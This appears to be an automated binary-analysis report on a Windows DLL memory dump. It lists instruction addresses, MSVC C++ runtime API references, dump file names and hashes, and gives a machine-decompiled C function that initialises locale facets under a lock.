0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8
0x6e1dba3b
0x6e1dba3b
0x6e1dba3e
0x6e1dba42
0x6e1dba46
0x6e1dba53
0x6e1dba5b
0x6e1dba5d
0x00000000
0x6e1dba5d
0x6e1dba24
0x6e1dba24
0x00000000
0x6e1dba24
0x6e1dba22
0x6e1db995
0x6e1db995
0x6e1db998
0x6e1db99c
0x6e1db9a0
0x6e1db9ad
0x6e1db9b5
0x6e1db9b7
0x00000000
0x6e1db9b7
0x6e1db97e
0x6e1db97e
0x00000000
0x6e1db97e
0x6e1db97c
0x6e1db8ef
0x6e1db8ef
0x6e1db8f2
0x6e1db8f6
0x6e1db8fa
0x6e1db907
0x6e1db90f
0x6e1db911
0x00000000
0x6e1db911
0x6e1db8d8
0x6e1db8d8
0x00000000
0x6e1db8d8
0x6e1db8d6
0x6e1db849
0x6e1db849
0x6e1db84c
0x6e1db850
0x6e1db854
0x6e1db861
0x6e1db869
0x6e1db86b
0x00000000
0x6e1db86b
0x6e1db832
0x6e1db832
0x00000000
0x6e1db832
0x6e1db830

APIs

__EH_prolog3.LIBCMT ref: 6E1DB7F9
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB803
int.LIBCPMT ref: 6E1DB81A

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

messages.LIBCPMT ref: 6E1DB83D
std::_Facet_Register.LIBCPMT ref: 6E1DB854
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB874
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB892

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: c2729e7c1f5a28d371c58e21996ca0de90527588ec4684ee5da783be31506773
Instruction ID: b9292da3e312ab8f224c9e62ff43f6fd2e43426f7e32534bb53cdd8050cbbcab
Opcode Fuzzy Hash: c2729e7c1f5a28d371c58e21996ca0de90527588ec4684ee5da783be31506773
Instruction Fuzzy Hash: 1A1123759105188BCF01EBE4C854EFEB77ABF54B04F140908E421A7290DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF567, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t550 - 0x14, 0);
				_t525 =  *0x6e286df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1A161C(0x6e286da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E1C66BA(_t550 - 0x14);
					return E6E1E0075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E1D1127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t550 - 0x20);
							E6E1E3D74(_t550 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t512, _t525, 0x14);
							E6E1C6653(_t550 - 0x14, 0);
							_t526 =  *0x6e286df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1A161C(0x6e286da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E1C66BA(_t550 - 0x14);
								return E6E1E0075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E1D11AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t550 - 0x20);
										E6E1E3D74(_t550 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t389, _t513, _t526, 0x14);
										E6E1C6653(_t550 - 0x14, 0);
										_t527 =  *0x6e286dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1A161C(0x6e286d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E1C66BA(_t550 - 0x14);
											return E6E1E0075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E1D1230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t550 - 0x20);
													E6E1E3D74(_t550 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t389, _t514, _t527, 0x14);
													E6E1C6653(_t550 - 0x14, 0);
													_t528 =  *0x6e286dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1A161C(0x6e286d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E1C66BA(_t550 - 0x14);
														return E6E1E0075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E1D12B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t550 - 0x20);
																E6E1E3D74(_t550 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t389, _t515, _t528, 0x14);
																E6E1C6653(_t550 - 0x14, 0);
																_t529 =  *0x6e286dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1A161C(0x6e286d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E1C66BA(_t550 - 0x14);
																	return E6E1E0075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E1D1339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t550 - 0x20);
																			E6E1E3D74(_t550 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t389, _t516, _t529, 0x14);
																			E6E1C6653(_t550 - 0x14, 0);
																			_t530 =  *0x6e286db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1A161C(0x6e286d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E1C66BA(_t550 - 0x14);
																				return E6E1E0075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E1D13A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t550 - 0x20);
																						E6E1E3D74(_t550 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t389, _t517, _t530, 0x14);
																						E6E1C6653(_t550 - 0x14, 0);
																						_t531 =  *0x6e286ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1A161C(0x6e286d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E1C66BA(_t550 - 0x14);
																							return E6E1E0075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E1D1409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t550 - 0x20);
																									E6E1E3D74(_t550 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t389, _t518, _t531, 0x14);
																									E6E1C6653(_t550 - 0x14, 0);
																									_t532 =  *0x6e286de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1A161C(0x6e286d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E1C66BA(_t550 - 0x14);
																										return E6E1E0075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E1D1471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t550 - 0x20);
																												E6E1E3D74(_t550 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t389, _t519, _t532, 0x14);
																												E6E1C6653(_t550 - 0x14, 0);
																												_t533 =  *0x6e286dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1A161C(0x6e286da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E1C66BA(_t550 - 0x14);
																													return E6E1E0075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E1D14EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t550 - 0x20);
																															E6E1E3D74(_t550 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t389, _t520, _t533, 0x14);
																															E6E1C6653(_t550 - 0x14, 0);
																															_t534 =  *0x6e286dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1A161C(0x6e286d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E1C66BA(_t550 - 0x14);
																																return E6E1E0075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E1D1558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t550 - 0x20);
																																		E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t389, _t521, _t534, 0x14);
																																		E6E1C6653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e286e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1A161C(0x6e286dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E1C66BA(_t550 - 0x14);
																																			return E6E1E0075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E1D15C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t550 - 0x20);
																																					E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t389, _t522, _t535, 0x14);
																																					E6E1C6653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e286dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1A161C(0x6e286d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1A171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E1C66BA(_t550 - 0x14);
																																						return E6E1E0075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E1D162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1A1438(_t473);
																																								E6E1E3D74(_t550 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e22851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e22c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E1D542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E1E0075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t523);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e286dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t522);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e286e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t521);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e286dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E1C6FD3(__eflags, _t520);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e286dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E1C6FD3(__eflags, _t519);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e286de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E1C6FD3(__eflags, _t518);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e286ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E1C6FD3(__eflags, _t517);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e286db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E1C6FD3(__eflags, _t516);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e286dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E1C6FD3(__eflags, _t515);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e286dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E1C6FD3(__eflags, _t514);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e286dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E1C6FD3(__eflags, _t513);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e286df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E1C6FD3(__eflags, _t512);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e286df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}

0x6e1cf567
0x6e1cf567
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf598
0x6e1cf59d
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
